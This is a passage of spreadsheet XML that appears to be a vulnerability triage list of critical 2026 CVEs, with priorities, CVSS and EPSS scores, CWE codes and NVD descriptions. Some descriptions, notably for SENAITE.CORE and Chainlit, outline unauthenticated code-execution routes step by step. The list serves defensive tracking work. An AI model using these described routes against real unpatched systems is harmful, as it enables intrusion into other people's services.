        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>An issue in Actions Semiconductor Co. Ltd Tool- Media Player Utilities v.4.46 allows a physically proximate attacker execute arbitrary code via the Production.dll and RdiskUpgrade.exe components</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-36433</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37006</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the WebSocket endpoint of gpt-researcher v0.14.7 and before allows an unauthenticated remote attacker to achieve code execution via malicious Model Context Protocol configurations.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37006</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37751</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the killSessionSync function (lib/agent-runtime.ts) of 23blocks-OS ai-maestro v0.24.17 allows attackers to execute arbitrary commands via a crafted input.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37751</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41871</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')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S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41871</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45018</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For stdio transport, the endpoint accepts a user-controlled fullCommand string. The validate_mcp_command() function in backend/chainlit/mcp.py checks only the executable name against config.features.mcp.stdio.allowed_executables and passes unchecked arguments to StdioServerParameters in backend/chainlit/server.py. Because npx supports the -c argument, an attacker can execute arbitrary shell commands with the privileges of the Chainlit process. If allowed_executables is unset, its None default is treated as allowing every executable. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45018</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50894</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>easyadmin v2.0.2.2 is vulnerable to Unrestricted Upload of File with Dangerous Type in the background management interface which allows authenticated remote attackers to execute arbitrary code and gain server privileges via a crafted file upload.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50894</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52103</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>A zero-click remote code execution (RCE) vulnerability in the /Terminal/Notification.hs component of SimpleX Chat before v6.5 allows attackers to execute arbitrary commands in the context of the application without user interaction via sending a crafted payload in a text message.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52103</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52490</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the process_command_opts() function in tools/tiffcrop.c</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52490</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53611</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>Looking Glass is a modern, stateless network-diagnostic platform — a single self-contained Go binary that fronts a fleet of routers over SSH and exposes ping / traceroute / BGP lookups through a gRPC (ConnectRPC) API, an embedded SvelteKit web UI, and a lg-cli client. Prior to version 1.3.5, there is an OS Command Injection vulnerability resulting from an unanchored regular expression in the input validation layer. This issue has been patched in version 1.3.5.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53611</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54569</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-95</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>SENAITE.CORE is the core framework for the SENAITE laboratory information management system. From 2.0.0 to 2.6.0, the SENAITE.CORE JSON API permits unauthenticated remote code execution through a two-request chain involving missing authorization and unsafe evaluation. The state-changing routes in src/bika/lims/jsonapi/update.py, including update, update_many, remove, doActionFor, doActionFor_many, and getusers, do not enforce the senaite.core: Access JSON API permission before resolving attacker-selected objects. In src/bika/lims/jsonapi/init.py, set_fields_from_request passes raw request values for RecordsField and RecordField instances to eval() before field mutator write-permission checks execute. An anonymous attacker can discover the bika_setup object identifier through @@uuid, send a value such as RejectionReasons to /@@API/update, and execute arbitrary Python in the Zope worker before a later mutation failure rolls back ZODB changes. The same unsafe evaluation pattern is present in src/senaite/core/browser/fields/record.py and src/senaite/core/browser/fields/records.py. Successful exploitation can expose or modify laboratory data, files, and accounts and can disrupt the service.</t>
        </is>
      </c>
      <c r="S41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54569</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55546</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>QWED-MCP i</t>
        </is>
      </c>
      <c r="S42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55546</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56207</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>Signature of Bearer token is not verified in last step of SAML2 authentication for Impala's hs2-http interface, allowing altering user name and acting as another user.
This issue affects Apache Impala: &gt;=4.0.0.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="S43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56207</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71624</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>An issue in esoTalk v.1.0.0g4 allows a remote attacker to execute arbitrary code via the core/models/ETMemberModel.class.php, core/controllers/ETMemberController.class.php, and core/lib/ET.class.php components</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71624</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71625</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-640</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>An issue in slimkit plus ThinkSNS+ v.2.4 allows a remote attacker to escalate privileges via the ResetPasswordController.php component</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71625</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71801</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in s-pms SPMS-Server through v1.0. The application contains a hardcoded default access token secret within its core configuration file, which is not overridden or removed in the production environment profile. A remote, unauthenticated attacker can locally forge valid administrative session tokens to completely bypass the authentication mechanism gaining full unauthorized access to protected backend APIs.</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71801</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71805</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload and path traversal vulnerability exists in LZ-litchi 1.0.0. Unauthenticated remote attackers can upload arbitrary files and write them outside the intended storage directory via the directory parameter in POST /app-api/infra/file/upload.</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71805</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75325</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>DWSurvey v6.14.0 is is vulnerable to authentication bypass via the '/api/dwsurvey/none/' and '/api/dwsurvey/up/**' parameters.</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75325</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
